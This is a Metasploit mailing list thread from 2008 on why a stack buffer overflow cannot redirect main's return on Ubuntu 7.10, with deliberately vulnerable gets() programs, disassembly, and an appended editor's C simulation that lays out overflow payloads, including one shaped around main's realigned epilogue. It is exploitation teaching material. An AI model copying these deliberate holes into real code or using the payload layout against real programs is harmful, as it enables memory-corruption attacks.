Metasploit mailing list archives
Buffer overflow in main
From: wbyoung at u.northwestern.edu (wbyoung at u.northwestern.edu)
Date: Fri, 29 Feb 2008 10:07:07 -0600
Sorry I didn't explain a little more. I understand buffer overflows and how they work. I've read Aleph One's Stack Smashing paper many times. I can overwrite the return address of the main function properly, which I've confirmed in gdb. Here's the disassembly of both functions. Some responses to me personally said to take this off list, so if this is really off topic, feel free to let me know.

Here's the disassembly of the two functions.

    0x08048374 <main+0>:    lea    0x4(%esp),%ecx
    0x08048378 <main+4>:    and    $0xfffffff0,%esp
    0x0804837b <main+7>:    pushl  0xfffffffc(%ecx)
    0x0804837e <main+10>:   push   %ebp
    0x0804837f <main+11>:   mov    %esp,%ebp
    0x08048381 <main+13>:   push   %ecx
    0x08048382 <main+14>:   sub    $0x44,%esp
    0x08048385 <main+17>:   lea    0xffffffbc(%ebp),%eax
    0x08048388 <main+20>:   mov    %eax,(%esp)
    0x0804838b <main+23>:   call   0x80482c4 <gets@plt>
    0x08048390 <main+28>:   mov    $0x0,%eax
    0x08048395 <main+33>:   add    $0x44,%esp
    0x08048398 <main+36>:   pop    %ecx
    0x08048399 <main+37>:   pop    %ebp
    0x0804839a <main+38>:   lea    0xfffffffc(%ecx),%esp
    0x0804839d <main+41>:   ret

    0x08048374 <run+0>:     push   %ebp
    0x08048375 <run+1>:     mov    %esp,%ebp
    0x08048377 <run+3>:     sub    $0x48,%esp
    0x0804837a <run+6>:     lea    0xffffffc0(%ebp),%eax
    0x0804837d <run+9>:     mov    %eax,(%esp)
    0x08048380 <run+12>:    call   0x80482c4 <gets@plt>
    0x08048385 <run+17>:    leave
    0x08048386 <run+18>:    ret

On Fri, Feb 29, 2008 at 6:30 AM, bambam <bambam.quiescence at googlemail.com> wrote:
Maybe it's gcc adding calls to exit functions that call the callgate to syscall exit, so main never returns? Don't know, haven't looked at anything this shallow in ages.

2008/2/28 <wbyoung at u.northwestern.edu>:

This isn't Metasploit specific, but it seems like a good place to ask: If I have a program:

    #include <stdio.h>

    int main() {
        char buffer[64];
        gets(buffer);   /* deliberately unbounded: the overflow under discussion */
        return 0;
    }

On Ubuntu 7.10 using gcc with --no-stack-protector and -z execstack options to compile, you can overflow the buffer and change the return address of main, but when main completes, it does not return to the address you might want. In this program, you can inject a return address and it returns to the address you specify:

    #include <stdio.h>

    void run() {
        char buffer[64];
        gets(buffer);   /* same unbounded read, now in a non-main frame */
    }

    int main() {
        run();
        return 0;
    }

I believe this has to do with the way libc returns from main, but if someone could explain (in as much detail as possible) or point to a resource that explains what is going on here, that'd be great.

Thanks!
- Whitney Young

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
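Editor's note on the disassembly posted above (this is an added worked example, not code from the thread or from either poster). The two epilogues differ in where `ret` fetches its target. run() ends with `leave; ret`, so the classic Aleph One layout holds: the 64-byte buffer at %ebp-0x40 is followed by the saved %ebp and then the slot `ret` pops. main() is different because gcc realigned the stack in the prologue (`lea 0x4(%esp),%ecx; and $0xfffffff0,%esp; pushl -4(%ecx)`), saved the pre-alignment pointer with `push %ecx` at %ebp-4, directly above the buffer at %ebp-0x44, and restores %esp from it on the way out (`pop %ecx; pop %ebp; lea -4(%ecx),%esp; ret`). A 64 + 4 + 4 payload therefore lands its "return address" in the saved %ebp slot and its filler in the saved %ecx slot, and `ret` pops from wherever that filler minus 4 points, not from %ebp+4. The model below lays both frames out byte for byte from the posted offsets and reports what `ret` would pop for a given payload. All addresses (STACK_BASE, LIBC_RET) and the payloads are constructed stand-ins; nothing here executes shellcode or touches a real stack.

```c
/* Added example: byte-level model of the two epilogues in the posted disassembly.
 * Constructed 32-bit addresses; the "stack" is a plain byte array. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STACK_SIZE  256
#define STACK_BASE  0xbffff000u          /* constructed: address of stack[0] */
#define FRAME_EBP   128                  /* index of the saved-%ebp slot in both frames */
#define CALLER_RET  144                  /* index of the return address pushed by main's caller */
#define LIBC_RET    0xb7e5f450u          /* constructed stand-in for the address main returns to */
#define RUN_BUF     (FRAME_EBP - 0x40)   /* run:  lea 0xffffffc0(%ebp),%eax */
#define MAIN_BUF    (FRAME_EBP - 0x44)   /* main: lea 0xffffffbc(%ebp),%eax */

/* Little-endian 32-bit load/store on the simulated stack. */
static uint32_t rd32(const uint8_t *s, int i) {
    return (uint32_t)s[i] | (uint32_t)s[i + 1] << 8 |
           (uint32_t)s[i + 2] << 16 | (uint32_t)s[i + 3] << 24;
}
static void wr32(uint8_t *s, int i, uint32_t v) {
    s[i] = (uint8_t)v;             s[i + 1] = (uint8_t)(v >> 8);
    s[i + 2] = (uint8_t)(v >> 16); s[i + 3] = (uint8_t)(v >> 24);
}
/* Map a simulated address back to a stack index; -1 if a 4-byte read would miss the array. */
static int addr_to_idx(uint32_t a) {
    if (a < STACK_BASE || a > STACK_BASE + STACK_SIZE - 4) return -1;
    return (int)(a - STACK_BASE);
}
/* gets(): copy with no bounds check (clipped only to keep the model in the array), then a NUL. */
static void fake_gets(uint8_t *stack, int buf, const uint8_t *p, size_t len) {
    size_t room = (size_t)(STACK_SIZE - buf - 1);
    if (len > room) len = room;
    memcpy(stack + buf, p, len);
    stack[buf + len] = 0;
}

/* run(): push %ebp; mov %esp,%ebp; sub $0x48,%esp; ...; leave; ret
 * Returns the value `ret` pops. */
uint32_t ret_target_run(const uint8_t *payload, size_t len) {
    uint8_t stack[STACK_SIZE] = {0};
    wr32(stack, FRAME_EBP, STACK_BASE + CALLER_RET + 8);  /* caller's %ebp (irrelevant) */
    wr32(stack, FRAME_EBP + 4, LIBC_RET);                 /* return address */
    fake_gets(stack, RUN_BUF, payload, len);
    /* leave: %esp = %ebp; pop %ebp -> %esp = %ebp+4; ret pops from there */
    return rd32(stack, FRAME_EBP + 4);
}

/* main(): lea 4(%esp),%ecx; and $-16,%esp; pushl -4(%ecx); push %ebp; mov %esp,%ebp;
 *         push %ecx; sub $0x44,%esp; ...; add $0x44,%esp; pop %ecx; pop %ebp;
 *         lea -4(%ecx),%esp; ret
 * Returns the value `ret` pops; sets *faulted when %ecx-4 points off the stack. */
uint32_t ret_target_main(const uint8_t *payload, size_t len, int *faulted) {
    uint8_t stack[STACK_SIZE] = {0};
    wr32(stack, CALLER_RET, LIBC_RET);                       /* pushed by the caller */
    wr32(stack, FRAME_EBP + 4, LIBC_RET);                    /* pushl -4(%ecx): a copy */
    wr32(stack, FRAME_EBP, 0);                               /* saved %ebp */
    wr32(stack, FRAME_EBP - 4, STACK_BASE + CALLER_RET + 4); /* saved %ecx = entry %esp + 4 */
    fake_gets(stack, MAIN_BUF, payload, len);
    uint32_t ecx = rd32(stack, FRAME_EBP - 4);               /* pop %ecx */
    uint32_t esp = ecx - 4;                                  /* lea -4(%ecx),%esp */
    int idx = addr_to_idx(esp);
    if (idx < 0) { *faulted = 1; return esp; }               /* ret would read an unmapped slot */
    *faulted = 0;
    return rd32(stack, idx);                                 /* ret */
}

/* The textbook payload: 64 filler bytes, 4 for saved %ebp, then the new return address. */
size_t naive_payload(uint8_t *out, uint32_t target) {
    memset(out, 'A', 68);
    wr32(out, 68, target);
    return 72;
}
/* A payload shaped for main's epilogue: the saved-%ecx slot at %ebp-4 receives a pointer
 * P with P-4 == %ebp+4, so `lea -4(%ecx),%esp; ret` pops the target placed at %ebp+4. */
size_t main_payload(uint8_t *out, uint32_t target) {
    memset(out, 'A', 64);
    wr32(out, 64, STACK_BASE + FRAME_EBP + 8);   /* becomes %ecx */
    memset(out + 68, 'B', 4);                    /* saved %ebp: don't care */
    wr32(out, 72, target);                       /* lands at %ebp+4 */
    return 76;
}

/* Scenarios; the target is the buffer's own address, where shellcode would sit. */
uint32_t scenario_run_naive(void)         { uint8_t p[80]; size_t n = naive_payload(p, STACK_BASE + RUN_BUF); return ret_target_run(p, n); }
int      scenario_main_naive_faults(void) { uint8_t p[80]; int f; size_t n = naive_payload(p, STACK_BASE + MAIN_BUF); ret_target_main(p, n, &f); return f; }
uint32_t scenario_main_fixed(void)        { uint8_t p[80]; int f; size_t n = main_payload(p, STACK_BASE + MAIN_BUF); return ret_target_main(p, n, &f); }
uint32_t scenario_main_no_overflow(void)  { int f; return ret_target_main((const uint8_t *)"hello", 5, &f); }

int main(void) {
    printf("run,  72-byte payload: ret pops %#x\n", scenario_run_naive());
    printf("main, 72-byte payload: %s\n", scenario_main_naive_faults()
           ? "saved %ecx clobbered; lea -4(%ecx),%esp points off the stack, so ret faults"
           : "ret pops the target");
    printf("main, 76-byte payload: ret pops %#x\n", scenario_main_fixed());
    return 0;
}
```

The practical reading: against this main(), the byte that matters is the one at buffer+64, which becomes %ecx, and the real return slot at %ebp+4 is only reached if %ecx-4 points at it. The model sets the legitimate saved %ecx explicitly rather than deriving it from the `and $0xfffffff0` padding, which depends on the entry %esp, and it models nothing about stack randomization or where the real stack lives; it only shows which slot `ret` reads.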
Current thread:
- Buffer overflow in main wbyoung at u.northwestern.edu (Feb 27)
- Buffer overflow in main warlord (Feb 28)
- Buffer overflow in main daniel (Feb 28)
- Message not available
- Buffer overflow in main wbyoung at u.northwestern.edu (Feb 29)